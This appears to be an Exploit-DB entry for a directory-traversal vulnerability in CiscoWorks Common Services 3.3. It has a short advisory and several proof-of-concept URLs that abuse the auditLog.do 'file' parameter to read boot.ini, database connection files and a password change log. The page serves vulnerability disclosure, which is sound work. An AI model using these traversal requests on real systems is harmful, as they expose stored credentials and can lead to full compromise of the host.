header-logo
Suggest Exploit
vendor:
CiscoWorks Common Services
by:
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: CiscoWorks Common Services
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE:
CPE: a:cisco:common_services:3.3
Metasploit:
Other Scripts:
Platforms Tested:

CiscoWorks Common Services Directory Traversal Vulnerability

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47905/info

CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

This issue is being monitored by Cisco Bug ID CSCto35577.

CiscoWorks Common Services 3.3 and prior are vulnerable.

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties DB connection info for all databases:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.
DB password change log:

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program
Files\CSCOpx\log\dbpwdChange.log